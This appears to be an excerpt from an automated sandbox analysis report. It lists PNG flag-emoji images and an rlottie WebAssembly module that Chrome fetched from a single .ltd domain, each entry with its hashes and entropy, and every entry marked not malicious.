                                  Preview:.PNG........IHDR.....................PLTEGpL.6E|9J.jx^.$.`o].".ky_. .gv.?Q.....0.n|Z.".bqa.!..=.et.p~`.!\Ha.ky`. .cr_. .o~*.$.etf.%`.!U...jy[..g.'.o~.ap[..........................................................................................................................................................................y..o.....v.z...f~.m}.`x.jy.Yr.eu.`qg|..[n.bq.Mh.Ti.]l.Vi.Md.Od.Vf.C_.F`.K^.O`.E\.?Z.9VPi..FZ.*G.>V.,K.7S.3Q./O.*J..M.-M.<S..M.+K.6P.1M.+K.?Q.)I.+I.&G.$FaOm.'G./J.5T.%E.(E..G.#C<W...?.!Az:e.%A.!@..>./C..=..:.$?..;..:..2..:..5..8I@o.":..6..1.Ju..8..4..3..4. 7..5..1$F}..1..4..,"Dz../.I...2..- Bx.....,..1.@v..*'>`..'..)06f{.1..(..,.=t..'.<rh.E.;q..'s.+.9pS!L.. .7nz.'k.)..%.3[....5li.&.3j9#Rz.!.2h&'YI.C.0gc.!..dk...,b.*`.(N^...(].&\.&b.%[.$YX..?.).#X.!T..Z..N..E..T..=..;..4..L;m......tRNS.....%48KTUccdgsx~................................................................................................................................................................p
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4880
                                  Entropy (8bit):7.923387249517334
                                  Encrypted:false
                                  SSDEEP:96:3sfOnueJs5mygVBh+s+2WjgxtwGTy7vmJJ1pdPmk+iDnU9MTvQ6jee:oIu3gVB5JtwFjoNIk9nnTvFl
                                  MD5:EF0FF0A8FD312B515E82F79EA344A2DA
                                  SHA1:E12E6292DE09D94E1D22C86FDA7FE8F30992B3D9
                                  SHA-256:6C9A06EDA0278A45C2B8B71701FBD3D77FFCE2DFF201179BA8B4F5CE5E6821BE
                                  SHA-512:6E585934BD10F5834554D62F6063CAA5285B8A9918F9BEF35704B1A2FC24C442365D31D4EBB870FA4474F20DE89667B15E9E85CB39DC36B94344E4D9A8266F81
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1ea.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.rA.}N..|kZ'..shX$..|..~hX$..~iY%..p.z8~k0...hW#..ubR..p0xb!.y?..x...iX%..U..|hX%..~..q..}gV#.....up_+bR...z...o^*.....t^N.cS ..@.._..[..Y.J..X.W.V..z.U..w.T.S..u.F.R.R.r....Q..y.P..}.P.X.O..n.G..y.O..l.L..u..h..U.L..r..V.I..`..k.J..^..d..k.G.F..\..u..]..U.D.}]..W.yA..Vy.Y..s.s@.j=.kV.uP..;|.|.~9..:.c;j...\9.y7.}8.dI.XP]z..R6.w4.q3}t&.J4.UCzr/|r&.g3.HIDt..C2vl,vf-.:/.9?.\!.D>.U/.[ xb!ra-me$.4;.21&k.o^).,,.-.{U!.58.),.G).)+.N$..5j[#.(+.'*.(+.'*.&).$*.&).'*.$(.*0.!).$(.&(.<'."&eU.."&.!$..(.!%yG..."..'.."..!.%,."%..#.. ..!_O..:.........%..#./". $..............(........ ...|4...... ....# .........................................................|%............................................................................................LE....-tRNS.....%14;CLSWccefvx~~.........................x.|....IDATx^.....@..@%...~.T-..3.......8k..$y..~.u.....:.M#..8^.J.b.i..0.AQ.m"8...8B....%...I...........%C......B...X.NT...8...A.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5630
                                  Entropy (8bit):7.852689694343607
                                  Encrypted:false
                                  SSDEEP:96:CsiK5556QzhI5bFbq/shFdc1hiP0bpF3fyhKy7SjC2TCV/R3lSNqB:DzPy3q/szjP0bpF307Sm20a4B
                                  MD5:697ADE357CE52985DFAA55264DC6D317
                                  SHA1:B05A196BBAF267E706B617DF5E6AA9EEA5D47EE5
                                  SHA-256:0C80A73526E5AE887B26584A0577D823B26E4C0649683B190D12FD67B08D2139
                                  SHA-512:8E85BF1B7BDA530DA02B8BF36A236A7EF568CC188486544E0CA4FA528A13402C86B4CE336DBBFA920ED4623024E3EF85466326E837B6E5DDD8960782C10A69EB
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLLb..$Lbx..(Pg}..#Kf|..+S...g}...,.6hKc..#K.2_......oYgv..q....Rbx.k...$L<T~f|..%LZp.f|..#Kk..`v..$Lj..bw..'Ok....E...................................................................................................g.....!..............&.....3...............D......-.........C...........G.............V.x.~.......ar...dq.lt..pg...Vci..cz..Xbez..KWTx.^v.iwpWs.\r..?PPo.Tm..CMHj..4EOh..0BAf.Ed..->.7D:b.B_..):.$65].?\..%68Y.-Y..!2....%4-U.&V.&V.2T.&U.%U....$T.%T.#S...($R...+"Q.../!P.&O.,N..O. N...(.N..M...%"K..K..K..J...#.I. H....*Ft. ,.G..G..G..F..F... .D..C... .C..C..B.....A..A..@..@..?..>}.?..?..>..=..;s.<..<..;..;.....9u....9..8..8}.6j.7..7..6..6..5..2c.2m.3~.3{y...2|.1..)../[.1y.0|..../{./u.-U..y.,..+a.*U.,qv...(y.)i.&R.&_.!v.#M. T..n..H..D).@ ....tRNS....,7BIScbcceg}~~~~~~.............................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):6332
                                  Entropy (8bit):7.934004795098357
                                  Encrypted:false
                                  SSDEEP:192:OtZuqy+gT/QXWiRcxHfvfP4654tKPEv332w:OtZu0Y4GQcxfP465HPE1
                                  MD5:C7F2437B49177EA45B571F714C1E8243
                                  SHA1:C3E15D330E9630B5EFD8283C02EE08D0E7E93FA4
                                  SHA-256:0D381380D35A122EB5367813B8A0F6762D32BF87D9219B94C4B4BCF9E10318C1
                                  SHA-512:ED30CEB6DE7C8F69F3D6032998941C49751415ED2E4927EFCAEF30232838654A4475E301277CF482DB796CF44B982D736CF65F05B95AFB84EF0D00AC5E411D3B
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL6FgW_|fv.....$G.ow..Co~.ip...B..Azz.....0\br...B.....7;Hhu..s....Fq|../:.px_o..!Diy.. C..^n.. Cgw..!E..=br.p...'J. C..;....................................................................................G................................A...............e...................|...Y........zd.....Y.x....n..........g.s{.}L...w....r.dpT..sM.ltr...}w.uXc...blg.w.T`.tfhz._y.D...hD.lV.R]as..FU&..`>Vp.rki4|..Y`Zl.Ul..:J._H.~.AN.7GNg.7p..2CGqYOc.Ybq.u.zXI.1AFb..-?.7D.q..->|EoF\.?\..):.'8.k..&79W.#c.>V..!23S.qE0.:..d.._..#3.P.5O..a......>%[d,M.)M.)M.(L.(L..[.(K.0J}..)'J.%I. \7%H.^;3#G.#F...$"D.%D| D...!.B.+?d.@. ?x....ML.=.^...Q).. ;q.;}.9|.8v.7i.7o.7t.7z.6y.5w.3g.3v.3s.2t.D..0^v...0r./p.,U.-q.,c.,n.*l.(N.)k.(h.'Y.'h.%a.%g.#I."R."[.!d..C..S..I..=.(FR...ptRNS......*-/A@RVXbgu~~~~~~.........................................................................................G......IDATx...p.....u...%.....`.....0....(.G.d.;.:v....f..V6.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3949
                                  Entropy (8bit):7.8812876441430735
                                  Encrypted:false
                                  SSDEEP:96:g4vow5KlCRUbCCg731tboCPZlSDmi5nNzjHlLXCu4I9Qn6:xvxKtOCtMZlSqi5nVFWi9Q6
                                  MD5:3A9B247198C41C92284E7DB869BFE5C0
                                  SHA1:AAB02CA8C88826A42C91D13EAB33E7102AE6A0BF
                                  SHA-256:DDD0B069E2BDBDFC262D94A1DA991DECD6960F7115478308C563F39610DF6D10
                                  SHA-512:A65731F2402D2E993071B4D21A3720F1EA9141D086926CEF4734F6446FEAEB9C911BFA366C8ED1E0833CB1643D943F07EEBC41552FB479DAE68DCB8417C2E50B
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f5-1f1f1.png
                                  Preview:.PNG........IHDR.....................PLTEGpLv-'...n&!...m& ...q)#q)#......p)#...o(".......;2...p(!...p("....TO.&.z%.p........s)#......p("q*$......p)#...n'!...q*#........s+%......i".g........................................................................................................................................................................................................................................................................y............tj....um.k_.i`.nf.^R.^R.]Q.]Q.\P.\P.`V.ZN.[O.ZN.YM.cZ.XL.YM.WK.UH.VJ.UI.VK.TH.SG.SG.NA.QE.QE.TI.PD.OC.OC.MA.RG.ea.G9.L@.J>.J>.I=.NC.J@.G;.F:.G<.LB.H=.D8.D9.>1.F;.B7.A5.I?.B6.?3.@4.E;.>2.>2.<0.7).?4.=1.F<.;/.8,.<0.:/.?5.9-.9-.7,.@6.7+.7+.A8.2%.7+.9..5*.=4.4).7-.8/.+..;3.1&.80.1'.!..2*.5..-#.%..,#.,#.0)}2+y0).'.|)".&.u+%}%.q'!x".o".h..........tRNS......%%56=HTWcccfgww~~~.~..............................................................................................................)......IDATx...Mn\E.......-H$F..H. .....a.,
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):6598
                                  Entropy (8bit):7.960008401909168
                                  Encrypted:false
                                  SSDEEP:192:wAmjV9324eAjik84cNleaLUJvZoZNLdXeuq4j9hH:CjVZ25Aq4a1rpBhH
                                  MD5:C9DB88F751644DB18B2D3BB13B6F6776
                                  SHA1:72EDD5A6CE03F73F8515D5E5AC7BC250C8C10B1C
                                  SHA-256:21F81E34BD90175CC7D8E808DD6DE9FE8E5BD0B2F7EF3E86575E0AB9CA7BE1BF
                                  SHA-512:15E0898735A292ACA5A2C5EC926DE56C5B34313F3DA197394849FCB4A70999DDEF1C925012048E63742DEE472BECA5A2D1B2D8E0E8E4696F47B582D69152FB49
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1f9.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.S>.us*"..a.vw0$.y.zu-%.sq)!.A7.y.;)w.&.e..Y..}E.u.Z.u-%.{v.%..pt-#.|.sw/&.vx0'.}o&...o..C..............................................................F..M.........?..N.....L..>..K.X.......N..I.X....b..G.F..4.i.B....C....P.@._.>.}.A.m.4....<....v.@.R....:.b.9.s.H.7.......&.5.q.f.3.W.D....3....1..P./.<....g....M.-........\.;.+...+.*.)....(..t..@.....Z.'.h....gV.iW.%.gW.bP....eT.fV..E..%..y....eU..{.cS.`N.cT..].ZH._O..".o:~..._P.wq.YL.~#.[K.|x....XH.{;.kd.SA._U.ZL.zU.UE.r..u .RB}xs.bY.WE.K9.P?.PB.O?.M=.gbouy.OA.L=.SF.m".XN.K;.H8.L=.>-.mA.H8.M?ule.[S.F6.A0.g..O@.K>.E5.C4.F8.B3.c..A2.@0.E8.H<.?0.NB.9(.UO.=/.@1.G<ga\.@3.:-.B7.>2.1#|W..@5.IC.7*`SN.<3.8,.)..8..2'lB3.6-.)..0&}2)RD=.*!y.&u( ...m$.9)%..H....#tRNS...."&,5=ET^cgiy~~.......................RIDATx...y\SW.....t....L_m..}..HHB.!.DH....2j..L......(A-F..j@ .e.AA........`....".R.....s.....V..#?R...|....'7...9s..3g.9s..3g.9s
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4520
                                  Entropy (8bit):7.90114454554436
                                  Encrypted:false
                                  SSDEEP:96:SMQRJKNgXPpNL+G10pNkOLzgmHm2pfYgWGYe6UJVe42XMUzMrgWqc:kGgxQU0pHPx3YgW+VJgFFMrgxc
                                  MD5:6522886EFFF653DC7BD775C00C8B7998
                                  SHA1:5F2D212C88383B337C45C1C51BA181B45C0B13B6
                                  SHA-256:39C283F169F90F1FEE264F866BDB120A4E7137D72F99D4DD3E410E5F1A60AF37
                                  SHA-512:CACCE06A43570883C56A3FB758C45065091E069EE2CFAD90787C3EB2E5E1A568B69374207630D6118F41C4917FEF5525E98A4C6F1130A44666B39C5B5563B38A
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLo.F..7h.xwj.p.mzm.h.yoj.lk.i.x..Sj.y.r..d1pc..S)b.ryk..~...#f.v..Ord..E.l.|.r.e.u.s.tg...Zl.|vh..t.e.u"N.g.x~p.n.}.s.\.psf..t...A..*..)..*..(..)..-..,..+..+.....(..+..)..(..*..%..$.....#..(..".. ..%...........&.................$..............%.....(.....2...........$..............#..........3......$....7.......!...2.2....!.....A... ....4..R...................4..-....|7...x.>........"....<.n7l.{.........f.wk.9...].pb.r.[9S.j...^.nI.cR.g......?.[Q.3U.fD.].}..~..z.6.TJ.M`.KH.^|uI.D=.y...P1.Q.aE..O+.N.w.;.U+.MH.]*.M.JA,.N).L/.O).K.t..7=:.S'.J'.I.q...K%.H.5<:.R.,:#.F.'9$.F{m../;!.D..R..H!.C..P..B..Awi...K..?&.A,.I..=.#=".<..Oqd...;..:..8..:..F.~9.|:..6..4..=.~4.x8.|3/p..~A.|1.z1.{/.v1.y..x-.o4.v+.u+.t*@\..t8.s(.r'.q'.d1.o'.g).](.U&.L!.B.........tRNS.....%'78KMacccerwx~...........................................................................................................................cph....IDATx...].\g.....q.sfv7...i.+
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5083
                                  Entropy (8bit):7.925450917311208
                                  Encrypted:false
                                  SSDEEP:96:HRV+zh06S/WXDOxLGIQWQwR3RCH3I9ZfzxgvaHr2orXzwjvr0hgtgjpn:x0zhSwq9R8cVgSyBjEgk
                                  MD5:2A1E7D7C49698DF72D6F9C3B45E4127C
                                  SHA1:8412389795C2CB3D9E2E9A561FCBBB7A92EAE2D0
                                  SHA-256:E87923DC59C6115C3F0CC255C4C21658A84CC685DF47CE02E50B6071B69C2AFA
                                  SHA-512:156A1D4D838958D6E2B819183DEBB7A58EF14AB09121B92BC8A14DB9D6674FD21688CF410E80FAFFC62639A27069BF3145D7E8E50AEF33E20B9783788A1122C1
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1ff.png
                                  Preview:.PNG........IHDR.....................PLTEGpLz.Bvp.c..vp3}q._..yh.g..zn.ym.StSr.....xm..WS...i..`..|p.x...$8.t.pd.g..ui..v.f..N.|yn.g..xl..w.wj.i..xGR.u.]..sg.............................q........J.....&..%..$..%..#.....$....;..#..#.. ........#...........J.............. ........X........#.....................................................................d.......|.......o....................t(h.........r....b.....~~.F..^..U..Z..P.....uw.F..uwt.~.J...Z%R..<...z..y.C.~nos.v..J:4..F}y.].-..~q.4.{&.~7|wffh%.}.+L$.|$.{9wswk.){u ~x.}v.*H]`a+vp.{t.225mj.yroc..&E'ql.wp[YY..A.H..tm."A.xo.oi.rk.&9.4G..>.ohSPR.ke.ri..<.mf..9.kd.f`..2;SU.ha..5..6._Z..6.e^..2JGD.%4..3.b[../._X..-.VQ..>..+.\V??4../..)..4.SL..&_%+s."..#..#33*|..w..)*0=.!g..&&&$$$"""9.. .K........>..... ...................................'tRNS.....$(1;@MV_cbccist~.....................>...cIDATx...Qk.P.....40...,yp.)..VA..|P$...e......"b .J..e..B...;.&7.&.l.......zO.X,...b.X,...b.X......... ...L&^.,..bJJ.bgX6(#.D.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:WebAssembly (wasm) binary module version 0x1 (MVP)
                                  Category:downloaded
                                  Size (bytes):317584
                                  Entropy (8bit):5.488976701123605
                                  Encrypted:false
                                  SSDEEP:6144:rkMe/HUtjAy9pQFJSEH7mrqSiCaLCA5O9io/fAi7BPqk1b/2c:rr00t9QFJSRrzd1J
                                  MD5:ADE36C82F1C7643DA3EF1244EC008DA5
                                  SHA1:19654576F8D08FEE41F8DCE3E8F21E61084B9589
                                  SHA-256:F186EFB3D724331C5D36813D3BBBE512630F9E199F4667F3C4AA43F3FEC6CF14
                                  SHA-512:33A450F01CBCA551F260D7B8D859F7ED8B8143F825D88121421E0A7FEAC07FD9E92C8D5D1FD17A5B5A192B63A28BD0DDDDCD49FD7CCF47D23B782ADE5D7F5686
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/rlottie-wasm.wasm
                                  Preview:.asm......._`....`....`...`.....`.....`......`......`........`.......`.........`.......`........`..`....}`...........`...`..........`...}`....}.`....}..`.}}.}`..~~~~.`..}.`.........`..~.`.}..`..}.}`.}.}`............`...}.`..}}.`.....~..`......~`.|..|`...~...`..~~..`..}..`..}}..`..~..~`...|`..........`.................`.....}}..`....}}.`...}}.`..}...`.............`..............`...............`......~~..`.....~~..`.....|..`..}..`..}...`..|......`.~...`.~~..`....~.~`.....}`.}}}.}`.|.}`.....}}}}}.`...~.`...}..`...}}..`...}}...`..~..`..~~.`..}}...`..}}}..`..}}}}.`..}}}}}..`..}}}}}}.`..|.`.}.....`..}}}..`..|..`..||||..`.~..`.~....`.~~~~..`.}...`.}}..`.|..`....~`...}.}`..}}.}`..}}}.}`.~~.}`.}..}`.}}}}.}`....|`.....|`.~~.|`.|.|.....a.a...a.b...a.c...a.d...a.e...a.f...a.g...a.h...a.i.^.a.j...a.k...a.l...a.m...a.n...a.o...a.p...a.q...a.r...a.s...a.t...a.u...a.v...a.w...a.x...a.y...a.z...a.A...a.B...a.memory........a.table.p.........................................%..........R..................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5305
                                  Entropy (8bit):7.82632516605208
                                  Encrypted:false
                                  SSDEEP:96:l4sE0jGj2A5chlLNVxoepC93pPOSVzrGMo7b8UokGLwC8aWZwZSqi:ly9SA5chliepC9335GMo7QUoQI1I
                                  MD5:27E624FF8A75E3933799D8FA7E32B67C
                                  SHA1:CFFF8352B7DA6003AA599CC3A01A71363B7BF02C
                                  SHA-256:AF5D745A960EF2E0B99329A50B563FAB42B30317B1BFB5EC71CE0F0FF26190FA
                                  SHA-512:CC7CC4C6F1071B92DA18BB45A5AD723756EA5C150A5AAB55CD5CCA27DA53997AC26504DBB0D43CFC788B19DDB0C65021DA4D53BE4C841C2DD8246A3F3ED0A90C
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL%zI#zF$}H&.N(.U(.X&.X(.Z4.a2.d6.h3.b-.Y4._B.fT.p].wd.~h..l..q..e.._..U.}K.wB.rC.pQ.xX.zC.m..;v..p..q..t..t..u..y..m..f.}...j..l..W...................d..0..}...............Y..n..5..J..I..G..F..E..B..A..?..>..<..:..8..3.1.....'...L.lX.wJ.oM.m5.kE.wX..k.y...".Y..T..N..E...................kol.W3.\5T.ll..p...Z3.^6.aB.[3.Z3.V/.Z4.U/.[3.R/.S,.O&.U,.[2.`4.r:.}?..C..H..G..I..I..K..L..M..N..Q..S!.U#.X&.[*.^+.`/.c1.e4.h7.j6.k8.l9.m:.m:.n:.o,.d!.\.............................................d....w....(..X...................................I..F..J..3..M..E..1..<.y%C.b.o' .P..Q'.Q".I.o?.c:.h=!uD.g5g....3.4:.#&'...$)V`Zrb).8KA.YN+.03.>D.37<.................:1....&$#......m*,.=A.HN.DI.AE.>C.:?.7<.5:.38.27.16./4.-2.+0.*/.(-.',.&+.%).!&. $..!..........|y.....tRNS.c...............................h7...[a..~~z..........................................................&GT|...gA+...............................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4442
                                  Entropy (8bit):7.92787409826961
                                  Encrypted:false
                                  SSDEEP:96:elQai6DHdRNZEiTYiNj8sdcq8+hzfoh5o/GikgreU5htoOG2:eWai6P/EiTYiN4s+q8Kzfo5o+iN1bog
                                  MD5:C17614918E42473F572F2278705E9BF8
                                  SHA1:39D2B5181D54A35C2FE18185CFE6FCBED1CB1DC7
                                  SHA-256:859650CD4034383D4B2BC14ADA21D739414EC63D9085FCC248C09986C5A5835B
                                  SHA-512:7D16833453FE6431AB6485737222EDE63695E6014F4B27C49FDF185C3E4077AC1FB18C6F7C5E08156FF7C9B43B3FF62B0FAFBCA8D560AE5CD41D6682808D9A46
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1eb.png
                                  Preview:.PNG........IHDR.....................PLTEGpLj~.]o..r..2`.l/..I.V..........unvmcCyc.|b.fx.xbYo`Dfx.cu.fy.bt._q.wb.u_.y.,yc..s.~h.}f.du.|f.r.*q.+9Nmwa..o.q.+ew.k}.r]..t..s..s..i.,BkRe.Re.....4R.3Q.3P......C.C.<.....@.@.@.D.&L.(.(.)n...H.H-.-!H...&.&....'l.. .2Q...+.+#.#....,q......2P/.0:.:!~"=.=.....6.6.0t...........9}.......$.%...4.6.............8.8..#.1O......E.E.....$....:w.....1.1....4x...k.Rf..6~4.4*J......N.p..!d]q.C`....?O.t.....)Rcw.4.4..........W....."C-l-.Q.}f..0`8Y......=.E.t......H_.....y...%D|Mg.8U..EXWl.t]..z.yb....4P.BZ....s.+.0J.~.....5i....L.....%R......N.HN.E.....3.d....1x/.*E.!w./K4.5.Xl...*x.z)...).C.......n..?Z.Ni.'>.+....ar.8U.?J...a.a.H`.Of...$7.6Y.._.2T...#.#...+Dm.hx...|.....~.}..).).n|..2/.Fwx?djL.q~q.5.....D..x....*.....)..4......_.aV..Q.Q?.!.T.M[T.....6.......1tRNS...~cd~~cc~..h69.%..mX...L...Q.......c.7...~. (F....IDATx....K.g...F.`..61..<x.l......0[ .^...#..."!..`xW.. T,A'X.I.%.......=.:B...n...PH..........&i....~......>.......
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4177
                                  Entropy (8bit):7.875406155849178
                                  Encrypted:false
                                  SSDEEP:96:roSqiakg5FTcz4Jx23u+snLp9eKVu78/iy4bktARfioNSd:rohiakUt32R0p9hdmbk0fsd
                                  MD5:4A1D22D5DC7F89A422E28E82CB9BED35
                                  SHA1:1C1A4E24C78159D3BCB0326270C38649D06BC4EC
                                  SHA-256:E514F8DB8364DE6D7110E16BAA7DBC45E59F48D1400BB0B95C8FB0F6C4EDC280
                                  SHA-512:B745F5F732A762A63DE9DCB00D2C5D1B3E79E2AB76226AC40F50FFB507697637F0789E04D7F2E682E300F3DE034F6EF2A7376A6BFBD660727AB513863973CF45
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1fb.png
                                  Preview:.PNG........IHDR.....................PLTEGpLqDIJ...mrG...djE...otG..K...im...a"*E...rvL...fkF........K..c)0.jopFK.uy.joF...puG...kp.Z`G...rwA...hlH...lqI...sw.tx.ekL. ?..s?E............................................................................................................................................................................}..px.w{.rw.go.ot.kp.ai.gm.hm.bh.di.Xa.^e.^d.Y`.U].Z`.OY.U].PY.V[.LU.QW.HQ.MT.BL.FN.BK~HN.=G.BI.8C.8C.8B.9D.7B.7B.7B.7A.6@.6A.;D.5@.4?.4?.5?.3>.2=.7@.4>.2=.0;.1<.0;./:..9.1;.4=w8?.-8.-8.,7.*6./8.+6.*4.+5.&2}-6.(3.'2.&1.#/.%0}(2v+4.%0.$/..+}$.."-."-z$.~"-.!,v%.p'0~ +..'i(/{.*}.)..(w *|.(z.(l#+z.'o )w.'z.%d$+..#w.%w.#r.%b!)u.#|. r."v.!s.!s.!c.%r. i."p. {..Y.&r..p..p..o..l..n..b. n..u..m..P.#g..W..]..a..l..L..p..[..T..L..X..F..j..O..I..L..J..d..A..B..=..R....@....}tRNS.....%*8;NTccceluw~~~................................................................................................................IDATx......].....i...x7.....H.. ....!.rAp.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4552
                                  Entropy (8bit):7.92901326460179
                                  Encrypted:false
                                  SSDEEP:96:pyzcewYsUGzhpsWI4d9CRMk9TVIv3FD5r7IfTslPz9fKP:pzeCzhRI47CRMkh+vL2TslPzNKP
                                  MD5:1BA79F6A2FEC07059E91FAED05D0E6D6
                                  SHA1:C73100942079C7AA454CABD6BAEB8E86EE435D85
                                  SHA-256:270813AAC27DDE5F6A168361F6B74AAAD045A941D52B0BA935E39F13E5446D11
                                  SHA-512:E806D061D612E55DBDF6E3EBA151BA22B3584DC756AAC534FB8E91034095CAC13D07985FF453576A863343675EA9CBA5FDC88CE6EE7A59025FE85E9104575815
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1f8.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.*Z.)-....`;HYR;TFhhh.O@iiiF\O.G,kkk.E(.E,ccc.?".H*.@%lllhhh.D,.G)eee```eee.I,Y]c.M/...]]].M/.M/CWt.M/.@".@"RPOAPg.@F$$$).^...&&&.......@..?.....D..=.)U.&R.....o7#N..F..B.).\..........I. L.!!!.....R.Y.1\...$.....P.~F..!'.[."(.......{B,W.(.].;A.?E.v=.=C".W!.U.(Y.0g.+\.5r.8y.q9..G.;.DDD&.Y.4;.',%.Y...666..N.L)..K.xA.s<""".O05`.,,,.vG111.8>))).$*.'+..4III.+11^..)/..$.b;.17.+1...iii.{H......XXXOOO.@!!.S.<..mB]]]???```TTTddd .N.i6.e...F....V-.R2:::.p@.$*.e8....Z6#.S6c...!.......3..-2.D$.V4.-2.K.QQQ.]1.+/).Y.95.*1.a-....G(....39.H.......ZZZ..........< .@..^9......i@"{Ql|\.>..e>..&.......<=q...R.y....#N.gk..........qP......1.7...L...z~#G..%.QZ.^i%W..MROZ........AI.v{&X.....'A....Z_;_....Plz...mq.PosU..BL.Fd...~..;j6Oy6.e-O......LHcn.@z.Bs...e...KJr.du.UUlk....'tRNS.~ccc.0` ..f.Pt.w..?>......c........t.....PIDATx...?k.p..q.Cc....h...z.lN.w..M.p...sP...!dp.`.Zo.C......(to.p7...5!i..=...{;..^|.....D".H$..D".H$...K..*I...e..(.......XNU64y
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5338
                                  Entropy (8bit):7.894749686253728
                                  Encrypted:false
                                  SSDEEP:96:vCbR7ei2MBjn2imGdMqhJCNu0UTJ4fjMaUJCNaMrMvQiHL1y+0mn72Q:vCdK6rFmGdMqhzD8waUXMQ1Zv2Q
                                  MD5:3EEB3B927F76C46157B9477DBB012561
                                  SHA1:C744E66E081CC4BD079DF4E738AEBB3A6F1E6BE6
                                  SHA-256:A7E11FAED942DEF47B92247DF145081D39100F0D46230023B901E7E66203FFC5
                                  SHA-512:B0B31DF69DBB845591528F4007B1EF29E2F4944A19140653319B9C33438BA4DBE406F909A307A3D7676145DDF5B37567C4C45F69FF416435180650AD3883585B
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f7-1f1ea.png
                                  Preview:.PNG........IHDR.....................PLTEGpLff.x....ey..hh.c.+ii..e...jj.w..x..gg.{....Vt........gg....{....[LLV|........ff.~..t....k...__.JJ.}..gg.__.....fYY...dd.5.J..W...[[..5NN......UU.CC.)(...Os.8..$...........!..............0.....;........%........5...........<...........;........Q..9.....Z.....b..=..g..?..t..Q.....k..8..}..L........`........_zz.vu.||qpp|hh.ii.hh{_^.``..&'.&&.&&.%$.$$.%.__..$$."".".VV..!!. .......!"WW....KM....LL...'...OO.. GGG.KK........$d...x1.AA.................$.==.88......!??....66..R........._$.77.00.........l...Y.....)).''.,*.k.....&&...>%%.A..$%.$$..%.!".""....!!.((. ..$......." .##.....................i...........U.. ........s.s........................7..........................>.............."..................................................................M....TtRNS.......',.;;FLQTY[[__`ffjllvww.............................................................5IDATx...y...}...s..\{.^^.....@..kP..J*.H.K]...?P..B*.H...E.D.......Jz.Z%J..i.` @e.....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5595
                                  Entropy (8bit):7.857516203339548
                                  Encrypted:false
                                  SSDEEP:96:c2MPoYFTAgFQB/vZOZ3+vQmKREM4KJ4r5vFH64UnzQG5BHIZjk:hMlAsQB/voZ3WQm6oKJO6rnj5Bodk
                                  MD5:FB741EF7B0C9F43B927DA0CCCA211F43
                                  SHA1:9F2B0DE7ED24756E41DA56CAE134EE8879030159
                                  SHA-256:5F1AEE2B5B8552508FFC206FB6D862960F5948FB199D1A42F2308E6CF1543D37
                                  SHA-512:E52DE45EA161E74097A15E1CE8B3E82426E27294102472632D4723ECE6A1779C9A623AD99FA062A624F43BD0698ED6B952B53029054AD4095E2907606E8F1537
                                  Malicious:false
                                  Reputation:low
